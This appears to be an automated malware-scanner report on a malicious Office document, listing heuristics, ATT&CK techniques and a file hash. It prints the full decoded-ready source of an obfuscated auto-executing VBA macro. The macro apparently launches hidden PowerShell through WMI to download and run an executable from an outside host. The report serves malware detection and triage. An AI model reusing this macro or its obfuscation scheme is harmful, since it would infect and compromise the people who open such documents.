Verdict: MALICIOUS
Risk Score: 228

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1071.001 Web Protocols
The sample contains heavily obfuscated VBA macros, including the auto-executing Document_Open and Workbook_Open routines. The critical heuristic OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER indicates a loader designed to execute code via CreateObject/Shell/exec. The GetObject and CallByName calls are used together with obfuscated strings, most likely to construct and execute a malicious payload, which suggests downloader functionality.
Heuristics (10)

- VBA macros detected [medium, 7 related findings] OLE_VBA_MACROS: Document contains VBA macro code.
- Obfuscated auto-exec VBA loader [critical] OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
  Matched line in script:
  tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18) Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18)) Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
- GetObject call [high] OLE_VBA_GETOBJ: GetObject call.
  Matched line in script:
  tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18) Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18)) Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
- CallByName call [high] OLE_VBA_CALLBYNAME: CallByName call.
  Matched line in script:
  Public Sub Document_Open() CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod End Sub
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] OLE_VBA_DOCOPEN: Document_Open macro.
  Matched line in script:
  Public Sub Document_Open() CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
- Workbook_Open macro [low] OLE_VBA_WBOPEN: Workbook_Open macro.
  Matched line in script:
  Sub Workbook_Open() Document_Open
- Environ() call (env variable access) [low] OLE_VBA_ENVIRON: Environ() call (env variable access).
  Matched line in script:
  jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _ Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _ Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)
- Suspicious extracted artifact [info] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4071 bytes |

SHA-256: dc471cabd54a845da9052c58ca5f64a594136a47c65a26910544488e16407521

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 2 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Public Sub Document_Open()
CallByName Me, CallByName(Me, "AJaqaMBlpXie", VbMethod, "746C85637557566384765586767D8484", 18), VbMethod
End Sub
Sub Workbook_Open()
Document_Open
End Sub
Public Sub bZsQcEDQrdCtdkrr()
Dim jSJWJoioisCWMvvKZZYnsRhPTdIGO As String
jSJWJoioisCWMvvKZZYnsRhPTdIGO = CallByName(Me, "AJaqaMBlpXie", VbMethod, "8281897784857A777E7E40778A77323F778A777587867B818082817E7B758B32748B82738585323F697B8076818965868B7E77325A7B76767780323F8081828481787B7E77323F8081778A7B86323F75325B576A323A6077893F61747C77758632658B8586777F4060778640697774557E7B7780863B40568189807E817376587B7E773A397A8686824C414185878282818486757780867784424A42424075817F41768189807E81737685417F738087737E40778A77393E3239", 18) & _
Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D36746C85637557566384765586767D8484324F326077893F61747C777586323F75817F32857A777E7E407382827E7B7573867B81804D3236746C85637557566384765586767D848440857A777E7E778A77758786773A39", 18) & _
Environ(CallByName(Me, "AJaqaMBlpXie", VbMethod, "86777F82", 18)) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E828475635740778A77", 18) & CallByName(Me, "AJaqaMBlpXie", VbMethod, "393B4D32778A7B864D", 18)
Dim tdFXHjZBrKkCTmaUFHgIektdGsKU As String
Dim PyyNGYVivNqIlvHhGikEEBBV As Integer
tdFXHjZBrKkCTmaUFHgIektdGsKU = CallByName(Me, "AJaqaMBlpXie", VbMethod, "40", 18)
Dim GGBzlY: Set GGBzlY = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F8844", 18))
Dim qPOmLxHndQYVOYya: Set qPOmLxHndQYVOYya = CallByName(GGBzlY, CallByName(Me, "AJaqaMBlpXie", VbMethod, "597786", 18), VbMethod, CallByName(Me, "AJaqaMBlpXie", VbMethod, "697B804544716284817577858565867384868782", 18))
Dim fSiKBrpyeyLeIcHnC: Set fSiKBrpyeyLeIcHnC = CallByName(qPOmLxHndQYVOYya, CallByName(Me, "AJaqaMBlpXie", VbMethod, "65827389805B8085867380757771", 18), VbMethod)
fSiKBrpyeyLeIcHnC.ShowWindow = 0
Dim QTTXHDgZPtPgeiFbttQ: Set QTTXHDgZPtPgeiFbttQ = GetObject(CallByName(Me, "AJaqaMBlpXie", VbMethod, "897B807F797F86854C6E6E", 18) & tdFXHjZBrKkCTmaUFHgIektdGsKU & CallByName(Me, "AJaqaMBlpXie", VbMethod, "6E848181866E757B7F88444C697B8045447162848175778585", 18))
CallByName QTTXHDgZPtPgeiFbttQ, CallByName(Me, "AJaqaMBlpXie", VbMethod, "558477738677", 18), VbMethod, jSJWJoioisCWMvvKZZYnsRhPTdIGO, Null, fSiKBrpyeyLeIcHnC, PyyNGYVivNqIlvHhGikEEBBV
End Sub
Public Function AJaqaMBlpXie(ByVal QTTXHDgZPtPgeiFbttQ As String, ByVal PyyNGYVivNqIlvHhGikEEBBV As Long) As String
QTTXHDgZPtPgeiFbttQ = oEqwKBCToGBIXaUgUUyg(QTTXHDgZPtPgeiFbttQ)
Dim i As Long
AJaqaMBlpXie = Space$(Len(QTTXHDgZPtPgeiFbttQ))
For i = 1& To Len(QTTXHDgZPtPgeiFbttQ)
Mid$(AJaqaMBlpXie, i) = Chr$(Asc(Mid$(QTTXHDgZPtPgeiFbttQ, i, 1&)) - PyyNGYVivNqIlvHhGikEEBBV)
Next
End Function
Private Function oEqwKBCToGBIXaUgUUyg(ByVal zVNooMbfnEmbGtgGFQ As String) As String
Dim ZudxpXcEsCgjPwSPnTkQh As Integer
Dim PAtMkYpKKhUxNiwyxrlhJCgvxFO As Integer
Dim TMvaAfFCdDMdpHSYosI As String
If Len(zVNooMbfnEmbGtgGFQ) = 0 Or Len(zVNooMbfnEmbGtgGFQ) Mod 2 <> 0 Then Exit Function
ZudxpXcEsCgjPwSPnTkQh = Len(zVNooMbfnEmbGtgGFQ)
For PAtMkYpKKhUxNiwyxrlhJCgvxFO = 1 To Len(zVNooMbfnEmbGtgGFQ)
If PAtMkYpKKhUxNiwyxrlhJCgvxFO Mod 2 <> 0 Then
TMvaAfFCdDMdpHSYosI = TMvaAfFCdDMdpHSYosI & Chr$(Val("&H" & Mid$(zVNooMbfnEmbGtgGFQ, PAtMkYpKKhUxNiwyxrlhJCgvxFO, 2)))
End If
Next
oEqwKBCToGBIXaUgUUyg = TMvaAfFCdDMdpHSYosI
End Function